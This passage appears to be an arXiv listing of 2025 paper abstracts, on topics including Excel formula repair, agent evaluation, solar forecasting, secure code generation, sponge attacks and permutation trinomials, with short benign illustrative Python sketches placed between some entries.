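In the paper's setting the population uses 30 such weight vectors over the alignment objectives; the trade-off parameters here are placeholders.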
Submitted 16 August, 2025;
originally announced August 2025.
-
Benchmark Dataset Generation and Evaluation for Excel Formula Repair with LLMs
Authors:
Ananya Singha,
Harshita Sahijwani,
Walt Williams,
Emmanuel Aboah Boateng,
Nick Hausman,
Miguel Di Luca,
Keegan Choudhury,
Chaya Binet,
Vu Le,
Tianwei Chen,
Oryan Rokeah Chen,
Sulaiman Vesal,
Sadid Hasan
Abstract:
Excel is a pervasive yet often complex tool, particularly for novice users, where runtime errors arising from logical mistakes or misinterpretations of functions pose a significant challenge. While large language models (LLMs) offer promising assistance by explaining formula errors, the automated correction of these semantic runtime errors remains an open problem. A primary challenge to advancing models for such scenarios is the severe lack of high-quality, comprehensive datasets for training and rigorous evaluation. This paper addresses this gap by introducing a novel approach for constructing a benchmark dataset specifically designed for Excel formula repair. We propose a data generation pipeline, which leverages a small set of curated seed samples from online forums to synthetically expand the dataset. Our pipeline integrates few-shot prompting with LLMs and employs a robust \textit{LLM-as-a-Judge} validation framework, combined with execution-based checks to ensure the correctness and semantic fidelity of the generated data. This process produced a benchmark dataset of 618 high-quality samples, covering common runtime errors. Furthermore, we propose a context-aware baseline technique for Excel formula repair that utilizes LLMs to leverage both the faulty formula, and relevant spreadsheet context. We evaluate the performance of various LLMs (GPT-4o, GPT-4.1, Phi-3, Mistral) on our newly generated benchmark using execution-based metrics. Our analysis demonstrates the dataset's quality through manual annotation and provides insights into error and function distributions. The proposed generation methodology is highly scalable and can be readily adapted to create evaluation benchmarks for similar code repair tasks in other low-resource programming languages.
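The execution-based validation step can be sketched generically. All names below are illustrative, not the paper's actual pipeline: a candidate repair is accepted only if it evaluates without a runtime error and reproduces the expected value on the spreadsheet context.

```python
def execution_check(candidate, context, expected, evaluate):
    """`evaluate(formula, context)` is an assumed formula interpreter:
    it returns the computed value or raises on a runtime error."""
    try:
        result = evaluate(candidate, context)
    except Exception:
        return False  # the repaired formula still crashes at runtime
    return result == expected

# Toy interpreter standing in for a real Excel engine:
def toy_eval(formula, ctx):
    if formula == "=SUM(A1:A2)":
        return ctx["A1"] + ctx["A2"]
    raise ValueError("unsupported formula")
```

A real pipeline would plug an actual Excel evaluation backend into `evaluate` and combine this check with the LLM-as-a-Judge verdict.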
Submitted 14 August, 2025;
originally announced August 2025.
-
Auto-Eval Judge: Towards a General Agentic Framework for Task Completion Evaluation
Authors:
Roshita Bhonsle,
Rishav Dutta,
Sneha Vavilapalli,
Harsh Seth,
Abubakarr Jaye,
Yapei Chang,
Mukund Rungta,
Emmanuel Aboah Boateng,
Sadid Hasan,
Ehi Nosakhare,
Soundar Srinivasan
Abstract:
The increasing adoption of foundation models as agents across diverse domains necessitates a robust evaluation framework. Current methods, such as LLM-as-a-Judge, focus only on final outputs, overlooking the step-by-step reasoning that drives agentic decision-making. Meanwhile, existing Agent-as-a-Judge systems, where one agent evaluates another's task completion, are typically designed for narrow, domain-specific settings. To address this gap, we propose a generalizable, modular framework for evaluating agent task completion independent of the task domain. The framework emulates human-like evaluation by decomposing tasks into sub-tasks and validating each step using available information, such as the agent's output and reasoning. Each module contributes to a specific aspect of the evaluation process, and their outputs are aggregated to produce a final verdict on task completion. We validate our framework by evaluating the Magentic-One Actor Agent on two benchmarks, GAIA and BigCodeBench. Our Judge Agent predicts task success with closer agreement to human evaluations, achieving 4.76% and 10.52% higher alignment accuracy, respectively, compared to the GPT-4o based LLM-as-a-Judge baseline. This demonstrates the potential of our proposed general-purpose evaluation framework.
Submitted 7 August, 2025;
originally announced August 2025.
-
A Study of Gender Classification Techniques Based on Iris Images: A Deep Survey and Analysis
Authors:
Basna Mohammed Salih Hasan,
Ramadhan J. Mstafa
Abstract:
Gender classification is attractive in a range of applications, including surveillance and monitoring, corporate profiling, and human-computer interaction. Individuals' identities may be gleaned from information about their gender, which is a kind of soft biometric. Over the years, several methods for determining a person's gender have been devised. Some of the most well-known ones are based on physical characteristics like face, fingerprint, palmprint, DNA, ears, gait, and iris, with facial features accounting for the vast majority of gender classification methods. The iris is also a significant biometric trait because, according to research, it remains essentially constant throughout an individual's life. In addition, the iris is externally visible and non-invasive to the user, which is important for practical applications. Furthermore, there are already high-quality methods for segmenting and encoding iris images, and current methods facilitate selecting and extracting attribute vectors from iris textures. This study discusses several approaches to determining gender, briefly reviewing the previous literature and the methodologies used in the different steps of gender classification. It provides researchers with knowledge and analysis of existing gender classification approaches, assists researchers interested in this specific area, highlights the gaps and challenges in the field, and finally provides suggestions and future paths for improvement.
Submitted 8 August, 2025; v1 submitted 7 August, 2025;
originally announced August 2025.
-
Semi-Supervised Deep Domain Adaptation for Predicting Solar Power Across Different Locations
Authors:
Md Shazid Islam,
A S M Jahid Hasan,
Md Saydur Rahman,
Md Saiful Islam Sajol
Abstract:
Accurate solar generation prediction is essential for proper estimation of renewable energy resources across diverse geographic locations. However, geographical and weather features vary from location to location, which introduces domain shift - a major bottleneck to developing location-agnostic prediction models. As a result, a machine-learning model that performs well in predicting solar power at one location may exhibit subpar performance at another. Moreover, the lack of properly labeled data and storage issues make the task even more challenging. In order to address domain shift due to varying weather conditions across different meteorological regions, this paper presents a semi-supervised deep domain adaptation framework, allowing accurate predictions with minimal labeled data from the target location. Our approach involves training a deep convolutional neural network on a source location's data and adapting it to the target location using a source-free, teacher-student model configuration. The teacher-student model leverages consistency and cross-entropy loss for semi-supervised learning, ensuring effective adaptation without requiring any source data at prediction time. With annotation of only $20\%$ of the data in the target domain, our approach yields accuracy improvements of up to $11.36\%$, $6.65\%$, and $4.92\%$ over a non-adaptive approach for California, Florida, and New York as target domains, respectively.
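The teacher-student objective described above has a simple structure, sketched here in scalar form under our own assumptions (squared error stands in for the paper's cross-entropy; all names are illustrative): labeled target samples contribute a supervised term, and every sample adds a consistency term pulling the student's prediction toward the frozen teacher's.

```python
def teacher_student_loss(student_pred, teacher_pred, label, is_labeled,
                         consistency_weight=1.0):
    """Sketch of the loss structure only: supervised term on the few
    labeled target samples plus a teacher-student consistency term
    applied to every sample (labeled or not)."""
    supervised = (student_pred - label) ** 2 if is_labeled else 0.0
    consistency = (student_pred - teacher_pred) ** 2
    return supervised + consistency_weight * consistency
```

Unlabeled samples (the bulk of the target domain) are trained purely through the consistency term, which is what makes the adaptation semi-supervised and source-free.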
Submitted 6 August, 2025;
originally announced August 2025.
-
Exploring the Feasibility of Deep Learning Techniques for Accurate Gender Classification from Eye Images
Authors:
Basna Mohammed Salih Hasan,
Ramadhan J. Mstafa
Abstract:
Gender classification has emerged as a crucial aspect in various fields, including security, human-machine interaction, surveillance, and advertising. Nonetheless, the accuracy of this classification can be influenced by factors such as cosmetics and disguise. Consequently, our study is dedicated to addressing this concern by concentrating on gender classification using color images of the periocular region. The periocular region refers to the area surrounding the eye, including the eyelids, eyebrows, and the region between them. It contains valuable visual cues that can be used to extract key features for gender classification. This paper introduces a sophisticated Convolutional Neural Network (CNN) model that utilizes color image databases to evaluate the effectiveness of the periocular region for gender classification. To validate the model's performance, we conducted tests on two eye datasets, namely CVBL and (Female and Male). The recommended architecture achieved an outstanding accuracy of 99% on the previously unused CVBL dataset while attaining a commendable accuracy of 96% with a small number of learnable parameters (7,235,089) on the (Female and Male) dataset. To ascertain the effectiveness of our proposed model for gender classification using the periocular region, we evaluated its performance through an extensive range of metrics and compared it with other state-of-the-art approaches. The results unequivocally demonstrate the efficacy of our model, thereby suggesting its potential for practical application in domains such as security and surveillance.
Submitted 7 August, 2025; v1 submitted 31 July, 2025;
originally announced August 2025.
-
Optimizing Solar Energy Production in the USA: Time-Series Analysis Using AI for Smart Energy Management
Authors:
Istiaq Ahmed,
Md Asif Ul Hoq Khan,
MD Zahedul Islam,
Md Sakibul Hasan,
Tanaya Jakir,
Arat Hossain,
Joynal Abed,
Muhammad Hasanuzzaman,
Sadia Sharmeen Shatyi,
Kazi Nehal Hasnain
Abstract:
As the US rapidly moves towards cleaner energy sources, solar energy is fast becoming the pillar of its renewable energy mix and one of the country's fastest-growing renewable sources. Yet even as solar energy is increasingly deployed, its variability remains a key hindrance to grid stability, storage efficiency, and overall system reliability. Integrating solar energy into the grid without compromising reliability or cost efficiency therefore requires good forecasting software and smart control systems. The dataset utilized for this research comprised both hourly and daily solar energy production records collected from multiple utility-scale solar farms across diverse U.S. regions, including California, Texas, and Arizona. Training and evaluation of all models were performed with a time-based cross-validation scheme, namely sliding-window validation. The Random Forest and XG-Boost models demonstrated noticeably stronger, and nearly identical, performance across all of the measures considered, with relatively high accuracy, indicating that both models learned the patterns in the data comprehensively and produce highly reliable predictions. By incorporating AI-powered time-series models like XG-Boost into grid management software, utility companies can use these predictions to dynamically modify storage cycles in real time and to inform dispatch and peak-load planning. AI-powered solar forecasting also has profound implications for renewable energy policy and planning, particularly as U.S. federal and state governments accelerate toward ambitious decarbonization goals.
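Sliding-window validation, the time-based scheme mentioned above, can be sketched as follows (window sizes are illustrative, not the paper's actual configuration). Unlike shuffled k-fold CV, every test index strictly follows its training window, so the model is never evaluated on the past.

```python
def sliding_window_splits(n, train_size, test_size, step):
    """Time-ordered splits: each window trains on `train_size`
    consecutive points and tests on the `test_size` points that follow,
    then slides forward by `step`."""
    splits, start = [], 0
    while start + train_size + test_size <= n:
        train = list(range(start, start + train_size))
        test = list(range(start + train_size, start + train_size + test_size))
        splits.append((train, test))
        start += step
    return splits
```

For hourly solar data, `train_size` and `test_size` would typically be chosen to cover whole days or weeks so each window sees full diurnal cycles.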
Submitted 29 June, 2025;
originally announced June 2025.
-
From Model Design to Organizational Design: Complexity Redistribution and Trade-Offs in Generative AI
Authors:
Sharique Hasan,
Alexander Oettl,
Sampsa Samila
Abstract:
This paper introduces the Generality-Accuracy-Simplicity (GAS) framework to analyze how large language models (LLMs) are reshaping organizations and competitive strategy. We argue that viewing AI as a simple reduction in input costs overlooks two critical dynamics: (a) the inherent trade-offs among generality, accuracy, and simplicity, and (b) the redistribution of complexity across stakeholders. While LLMs appear to defy the traditional trade-off by offering high generality and accuracy through simple interfaces, this user-facing simplicity masks a significant shift of complexity to infrastructure, compliance, and specialized personnel. The GAS trade-off, therefore, does not disappear but is relocated from the user to the organization, creating new managerial challenges, particularly around accuracy in high-stakes applications. We contend that competitive advantage no longer stems from mere AI adoption, but from mastering this redistributed complexity through the design of abstraction layers, workflow alignment, and complementary expertise. This study advances AI strategy by clarifying how scalable cognition relocates complexity and redefines the conditions for technology integration.
Submitted 10 June, 2025;
originally announced June 2025.
-
MuSciClaims: Multimodal Scientific Claim Verification
Authors:
Yash Kumar Lal,
Manikanta Bandham,
Mohammad Saqib Hasan,
Apoorva Kashi,
Mahnaz Koupaee,
Niranjan Balasubramanian
Abstract:
Assessing scientific claims requires identifying, extracting, and reasoning with multimodal data expressed in information-rich figures in scientific literature. Despite the large body of work in scientific QA, figure captioning, and other multimodal reasoning tasks over chart-based data, there are no readily usable multimodal benchmarks that directly test claim verification abilities. To remedy this gap, we introduce a new benchmark MuSciClaims accompanied by diagnostics tasks. We automatically extract supported claims from scientific articles, which we manually perturb to produce contradicted claims. The perturbations are designed to test for a specific set of claim verification capabilities. We also introduce a suite of diagnostic tasks that help understand model failures. Our results show most vision-language models are poor (~0.3-0.5 F1), with even the best model only achieving 0.72 F1. They are also biased towards judging claims as supported, likely misunderstanding nuanced perturbations within the claims. Our diagnostics show models are bad at localizing correct evidence within figures, struggle with aggregating information across modalities, and often fail to understand basic components of the figure.
Submitted 29 July, 2025; v1 submitted 4 June, 2025;
originally announced June 2025.
-
Evaluating Apple Intelligence's Writing Tools for Privacy Against Large Language Model-Based Inference Attacks: Insights from Early Datasets
Authors:
Mohd. Farhan Israk Soumik,
Syed Mhamudul Hasan,
Abdur R. Shahid
Abstract:
The misuse of Large Language Models (LLMs) to infer emotions from text for malicious purposes, known as emotion inference attacks, poses a significant threat to user privacy. In this paper, we investigate the potential of Apple Intelligence's writing tools, integrated across iPhone, iPad, and MacBook, to mitigate these risks through text modifications such as rewriting and tone adjustment. By developing early novel datasets specifically for this purpose, we empirically assess how different text modifications influence LLM-based detection. This capability suggests strong potential for Apple Intelligence's writing tools as privacy-preserving mechanisms. Our findings lay the groundwork for future adaptive rewriting systems capable of dynamically neutralizing sensitive emotional content to enhance user privacy. To the best of our knowledge, this research provides the first empirical analysis of Apple Intelligence's text-modification tools within a privacy-preservation context with the broader goal of developing on-device, user-centric privacy-preserving mechanisms to protect against LLMs-based advanced inference attacks on deployed systems.
Submitted 4 June, 2025;
originally announced June 2025.
-
Teaching an Old LLM Secure Coding: Localized Preference Optimization on Distilled Preferences
Authors:
Mohammad Saqib Hasan,
Saikat Chakraborty,
Santu Karmaker,
Niranjan Balasubramanian
Abstract:
LLM generated code often contains security issues. We address two key challenges in improving secure code generation. First, obtaining high quality training data covering a broad set of security issues is critical. To address this, we introduce a method for distilling a preference dataset of insecure and secure code pairs from frontier LLMs, along with a security reasoning that explains the issues and the fix. The key idea here is to make use of security knowledge sources to devise a systematic prompting strategy that ensures broad coverage. Second, aligning models to secure code requires focusing on localized regions of code. Direct preference optimization methods, like SimPO, are not designed to handle these localized differences and turn out to be ineffective. We address this with a new localized preference optimization algorithm that masks the security related tokens in both the winning (secure) and losing (insecure) responses. To prevent loss in code quality, we also add a regularizer. Evaluations show that both training on our dataset, DiSCo, and the new preference optimization algorithm, LPO, yield substantial reductions in code insecurity while also improving overall code quality. Code and dataset are available at https://github.com/StonyBrookNLP/disco-lpo.
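The "localized" part of the optimization can be sketched as follows. The abstract says LPO masks security-related tokens in both responses; this hedged illustration assumes one plausible reading, that the SimPO-style length-normalised preference margin is computed only over those masked positions (the exact LPO objective and its regularizer may differ).

```python
def localized_preference_margin(logp_w, logp_l, mask_w, mask_l):
    """Restrict per-token log-probabilities to security-related
    positions (mask == 1) of the winning (secure) and losing (insecure)
    responses, then take a length-normalised margin to maximise."""
    sw = sum(lp for lp, m in zip(logp_w, mask_w) if m)
    sl = sum(lp for lp, m in zip(logp_l, mask_l) if m)
    nw = max(1, sum(mask_w))
    nl = max(1, sum(mask_l))
    return sw / nw - sl / nl
```

Training would push this margin up (e.g. through a sigmoid loss), concentrating the preference signal on the code regions that actually differ in security.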
Submitted 10 September, 2025; v1 submitted 31 May, 2025;
originally announced June 2025.
-
Digital Forensic Investigation of the ChatGPT Windows Application
Authors:
Malithi Wanniarachchi Kankanamge,
Nick McKenna,
Santiago Carmona,
Syed Mhamudul Hasan,
Abdur R. Shahid,
Ahmed Imteaj
Abstract:
The ChatGPT Windows application offers better user interaction in the Windows operating system (OS) by enhancing productivity and streamlining the workflow of ChatGPT's utilization. However, there are potential misuses associated with this application that require rigorous forensic analysis. This study presents a holistic forensic analysis of the ChatGPT Windows application, focusing on identifying and recovering digital artifacts for investigative purposes. With the use of widely popular and openly available digital forensics tools such as Autopsy, FTK Imager, Magnet RAM Capture, Wireshark, and Hex Workshop, this research explores different methods to extract and analyze cache, chat logs, metadata, and network traffic from the application. Our key findings also demonstrate the history of the application's chat, user interactions, and system-level traces that can be recovered even after deletion, providing critical insights into the crime investigation and, thus, documenting and outlining a potential misuse report for digital forensics.
Submitted 29 May, 2025;
originally announced May 2025.
-
Multi-Party Conversational Agents: A Survey
Authors:
Sagar Sapkota,
Mohammad Saqib Hasan,
Mubarak Shah,
Santu Karmaker
Abstract:
Multi-party Conversational Agents (MPCAs) are systems designed to engage in dialogue with more than two participants simultaneously. Unlike traditional two-party agents, designing MPCAs faces additional challenges due to the need to interpret both utterance semantics and social dynamics. This survey explores recent progress in MPCAs by addressing three key questions: 1) Can agents model each participant's mental states? (State of Mind Modeling); 2) Can they properly understand the dialogue content? (Semantic Understanding); and 3) Can they reason about and predict future conversation flow? (Agent Action Modeling). We review methods ranging from classical machine learning to Large Language Models (LLMs) and multi-modal systems. Our analysis underscores Theory of Mind (ToM) as essential for building intelligent MPCAs and highlights multi-modal understanding as a promising yet underexplored direction. Finally, this survey offers guidance to future researchers on developing more capable MPCAs.
Submitted 24 May, 2025;
originally announced May 2025.
-
$\texttt{DIAMONDs}$: A Dataset for $\mathbb{D}$ynamic $\mathbb{I}$nformation $\mathbb{A}$nd $\mathbb{M}$ental modeling $\mathbb{O}$f $\mathbb{N}$umeric $\mathbb{D}$iscussions
Authors:
Sayontan Ghosh,
Mahnaz Koupaee,
Yash Kumar Lal,
Pegah Alipoormolabashi,
Mohammad Saqib Hasan,
Jun Seok Kang,
Niranjan Balasubramanian
Abstract:
Understanding multiparty conversations demands robust Theory of Mind (ToM) capabilities, including the ability to track dynamic information, manage knowledge asymmetries, and distinguish relevant information across extended exchanges. To advance ToM evaluation in such settings, we present a carefully designed scalable methodology for generating high-quality benchmark conversation-question pairs with these characteristics. Using this methodology, we create $\texttt{DIAMONDs}$, a new conversational QA dataset covering common business, financial or other group interactions. In these goal-oriented conversations, participants often have to track certain numerical quantities (say $\textit{expected profit}$) of interest that can be derived from other variable quantities (like $\textit{marketing expenses, expected sales, salary}$, etc.), whose values also change over the course of the conversation. $\texttt{DIAMONDs}$ questions pose simple numerical reasoning problems over such quantities of interest (e.g., $\textit{funds required for charity events, expected company profit next quarter}$, etc.) in the context of the information exchanged in conversations. This allows for precisely evaluating ToM capabilities for carefully tracking and reasoning over participants' knowledge states.
Our evaluation of state-of-the-art language models reveals significant challenges in handling participant-centric reasoning, specifically in situations where participants have false beliefs. Models also struggle with conversations containing distractors and show limited ability to identify scenarios with insufficient information. These findings highlight current models' ToM limitations in handling real-world multi-party conversations.
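The bookkeeping that $\texttt{DIAMONDs}$ questions require can be illustrated with a short sketch (variable names are ours, not the dataset's): quantities are updated turn by turn across the conversation, and the derived quantity of interest must always be recomputed from the latest values.

```python
def track_derived_quantity(updates, inputs, formula):
    """Replay (variable, value) updates in conversation order and
    recompute `formula` over the latest state whenever all of its
    input variables are known."""
    state, history = {}, []
    for var, value in updates:
        state[var] = value
        if all(k in state for k in inputs):
            history.append(formula(state))
    return history

# Illustrative: expected profit derived from three changing quantities.
profit = lambda s: s["expected_sales"] - s["marketing"] - s["salary"]
updates = [("expected_sales", 100), ("marketing", 20),
           ("salary", 30), ("marketing", 10)]
```

A model answering correctly must use the final state (profit 60 here), not a stale intermediate value; distractor updates and participants' false beliefs are what make this hard in practice.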
Submitted 18 May, 2025;
originally announced May 2025.
-
Sponge Attacks on Sensing AI: Energy-Latency Vulnerabilities and Defense via Model Pruning
Authors:
Syed Mhamudul Hasan,
Hussein Zangoti,
Iraklis Anagnostopoulos,
Abdur R. Shahid
Abstract:
Recent studies have shown that sponge attacks can significantly increase the energy consumption and inference latency of deep neural networks (DNNs). However, prior work has focused primarily on computer vision and natural language processing tasks, overlooking the growing use of lightweight AI models in sensing-based applications on resource-constrained devices, such as those in Internet of Things (IoT) environments. These attacks pose serious threats of energy depletion and latency degradation in systems where limited battery capacity and real-time responsiveness are critical for reliable operation. This paper makes two key contributions. First, we present the first systematic exploration of energy-latency sponge attacks targeting sensing-based AI models. Using wearable sensing-based AI as a case study, we demonstrate that sponge attacks can substantially degrade performance by increasing energy consumption, leading to faster battery drain, and by prolonging inference latency. Second, to mitigate such attacks, we investigate model pruning, a widely adopted compression technique for resource-constrained AI, as a potential defense. Our experiments show that pruning-induced sparsity significantly improves model resilience against sponge poisoning. We also quantify the trade-offs between model efficiency and attack resilience, offering insights into the security implications of model compression in sensing-based AI systems deployed in IoT environments.
Submitted 9 May, 2025;
originally announced May 2025.
-
A Unifying Bias-aware Multidisciplinary Framework for Investigating Socio-Technical Issues
Authors:
Sacha Hasan,
Mehdi Rizvi,
Yingfang Yuan,
Kefan Chen,
Lynne Baillie,
Wei Pang
Abstract:
This paper aims to bring together the disciplines of social science (SS) and computer science (CS) in the design and implementation of a novel multidisciplinary framework for systematic, transparent, ethically-informed, and bias-aware investigation of socio-technical issues. For this, various analysis approaches from social science and machine learning (ML) were applied in a structured sequence to arrive at an original methodology of identifying and quantifying objects of inquiry. A core feature of this framework is that it highlights where bias occurs and suggests possible steps to mitigate it. This is to improve the robustness, reliability, and explainability of the framework and its results. Such an approach also ensures that the investigation of socio-technical issues is transparent about its own limitations and potential sources of bias. To test our framework, we utilised it in the multidisciplinary investigation of the online harms encountered by minoritised ethnic (ME) communities when accessing and using digitalised social housing services in the UK. We draw our findings from 100 interviews with ME individuals in four cities across the UK to understand ME vulnerabilities when accessing and using digitalised social housing services. In our framework, a sub-sample of interviews focusing on ME individuals residing in social housing units were inductively coded. This resulted in the identification of the topics of discrimination, digital poverty, lack of digital literacy, and lack of English proficiency as key vulnerabilities of ME communities. Further ML techniques such as Topic Modelling and Sentiment Analysis were used within our framework where we found that Black African communities are more likely to experience these vulnerabilities in the access, use and outcome of digitalised social housing services.
Submitted 6 May, 2025;
originally announced May 2025.
-
Four new classes of permutation trinomials and their compositional inverses
Authors:
Sartaj Ul Hasan,
Ramandeep Kaur,
Hridesh Kumar
Abstract:
We construct four new classes of permutation trinomials over the cubic extension of a finite field with even characteristic. Additionally, we explicitly provide the compositional inverse of each class of permutation trinomials in polynomial form. Furthermore, we derive the compositional inverse of the permutation trinomial $αX^{q(q^2 - q + 1)} + βX^{q^2 - q + 1} + 2X$ for $α = 1$ and $β = 1$, originally proposed by Xie, Li, Xu, Zeng, and Tang (2023).
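For small fields, whether a polynomial is a permutation can be checked by brute force. The toy sketch below (illustrative only; it uses $\mathbb{F}_{2^3}$ rather than the cubic extensions treated in the paper) encodes elements of $\mathrm{GF}(2)[x]/(x^3 + x + 1)$ as 3-bit integers, with XOR as addition and carry-less multiplication with reduction.

```python
# Illustrative brute-force permutation check over GF(2^3), not the
# constructions from the paper.

MOD = 0b1011  # x^3 + x + 1, irreducible over GF(2)

def gf_mul(a, b):
    """Carry-less multiply in GF(2^3), reducing modulo x^3 + x + 1."""
    p = 0
    while b:
        if b & 1:
            p ^= a
        b >>= 1
        a <<= 1
        if a & 0b1000:  # degree reached 3: reduce
            a ^= MOD
    return p

def gf_pow(a, n):
    r = 1
    for _ in range(n):
        r = gf_mul(r, a)
    return r

def is_permutation(f, q=8):
    """f permutes GF(q) iff its image on all q elements has q distinct values."""
    return len({f(x) for x in range(q)}) == q

# X^3 permutes GF(8) since gcd(3, 8 - 1) = 1 ...
print(is_permutation(lambda x: gf_pow(x, 3)))      # True
# ... whereas X^2 + X is 2-to-1 (its kernel is {0, 1}), so it is not.
print(is_permutation(lambda x: gf_pow(x, 2) ^ x))  # False
```

Brute force is only feasible for tiny fields; the value of results like those in the abstract is that they certify permutation behavior, and give inverses, for whole infinite families of fields at once.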
Submitted 4 May, 2025;
originally announced May 2025.